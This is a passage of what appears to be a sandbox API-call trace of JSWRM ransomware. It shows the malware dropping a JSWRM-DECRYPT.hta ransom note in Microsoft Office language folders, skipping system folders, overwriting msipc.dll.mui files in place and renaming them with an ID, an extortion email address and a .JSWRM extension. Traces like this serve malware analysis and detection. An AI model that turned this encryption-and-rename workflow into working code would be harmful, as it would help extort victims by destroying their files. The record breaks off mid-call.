[0136.422] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.422] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.423] CloseHandle (hObject=0x238) returned 1 [0136.423] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\gl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\gl\\jswrm-decrypt.hta")) returned 0x20 [0136.424] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\gl\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa178468, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa178468, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x47f8f630, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x231e00 [0136.424] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.424] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa178468, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa178468, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x47f8f630, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.424] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.424] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.424] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47f8f630, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x47f8f630, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x47f8f630, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.424] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.424] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.424] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.424] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.424] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.424] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.424] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.424] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.424] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.424] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.424] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa178468, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa178468, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa2cf9c3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5698, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.424] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.424] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.424] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.424] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.424] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.424] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.425] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.425] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.425] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.425] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.425] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\gl\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\gl\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.426] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=22168) returned 1 [0136.426] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.426] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5690, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5690, lpOverlapped=0x0) returned 1 [0136.429] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.429] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5690, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5690, lpOverlapped=0x0) returned 1 [0136.429] CloseHandle (hObject=0x314) returned 1 [0136.429] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\gl\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\gl\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\gl\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\gl\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.430] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa178468, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa178468, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa2cf9c3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5698, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.430] FindClose (in: hFindFile=0x231e00 | out: hFindFile=0x231e00) returned 1 [0136.430] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf618b1a4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf618b1a4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf618b1a4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="he", cAlternateFileName="")) returned 1 [0136.430] lstrcmpiW (lpString1="he", lpString2=".") returned 1 [0136.430] lstrcmpiW (lpString1="he", lpString2="..") returned 1 [0136.430] lstrcmpiW (lpString1="he", lpString2="...") returned 1 [0136.430] lstrcmpiW (lpString1="he", lpString2="windows") returned -1 [0136.430] lstrcmpiW (lpString1="he", lpString2="recovery") returned -1 [0136.430] lstrcmpiW (lpString1="he", lpString2="perflogs") returned -1 [0136.430] lstrcmpiW (lpString1="he", lpString2="documents and settings") returned 1 [0136.430] lstrcmpiW (lpString1="he", lpString2="$RECYCLE.BIN") returned 1 [0136.431] lstrcmpiW (lpString1="he", lpString2="system volume information") returned -1 [0136.431] lstrcmpiW (lpString1="he", lpString2="msocache") returned -1 [0136.431] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\he\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\he\\jswrm-decrypt.hta")) returned 0xffffffff [0136.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.431] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\he\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\he\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.432] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.432] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.433] CloseHandle (hObject=0x238) returned 1 [0136.433] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\he\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\he\\jswrm-decrypt.hta")) returned 0x20 [0136.433] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\he\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf618b1a4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf618b1a4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x47fb576b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x231c40 [0136.433] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.433] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf618b1a4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf618b1a4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x47fb576b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.434] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.434] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.434] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47fb576b, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x47fb576b, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x47fb576b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.434] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.434] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.434] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.434] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.434] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.434] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.434] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.434] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.434] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.434] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.434] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf618b1a4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf618b1a4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf618b1a4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4898, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.434] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.434] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.434] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.434] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.434] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.434] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.434] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.434] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.434] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.434] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.435] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\he\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\he\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.436] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=18584) returned 1 [0136.436] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.436] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4890, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x4890, lpOverlapped=0x0) returned 1 [0136.439] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.439] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4890, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x4890, lpOverlapped=0x0) returned 1 [0136.439] CloseHandle (hObject=0x314) returned 1 [0136.439] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\he\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\he\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\he\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\he\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.440] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf618b1a4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf618b1a4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf618b1a4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4898, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.440] FindClose (in: hFindFile=0x231c40 | out: hFindFile=0x231c40) returned 1 [0136.440] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56853a0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56853a0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56853a0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="hi", cAlternateFileName="")) returned 1 [0136.441] lstrcmpiW (lpString1="hi", lpString2=".") returned 1 [0136.441] lstrcmpiW (lpString1="hi", lpString2="..") returned 1 [0136.441] lstrcmpiW (lpString1="hi", lpString2="...") returned 1 [0136.441] lstrcmpiW (lpString1="hi", lpString2="windows") returned -1 [0136.441] lstrcmpiW (lpString1="hi", lpString2="recovery") returned -1 [0136.441] lstrcmpiW (lpString1="hi", lpString2="perflogs") returned -1 [0136.441] lstrcmpiW (lpString1="hi", lpString2="documents and settings") returned 1 [0136.441] lstrcmpiW (lpString1="hi", lpString2="$RECYCLE.BIN") returned 1 [0136.441] lstrcmpiW (lpString1="hi", lpString2="system volume information") returned -1 [0136.441] lstrcmpiW (lpString1="hi", lpString2="msocache") returned -1 [0136.441] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\hi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\hi\\jswrm-decrypt.hta")) returned 0xffffffff [0136.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.441] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\hi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\hi\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.442] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.442] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.443] CloseHandle (hObject=0x238) returned 1 [0136.443] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\hi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\hi\\jswrm-decrypt.hta")) returned 0x20 [0136.443] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\hi\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, 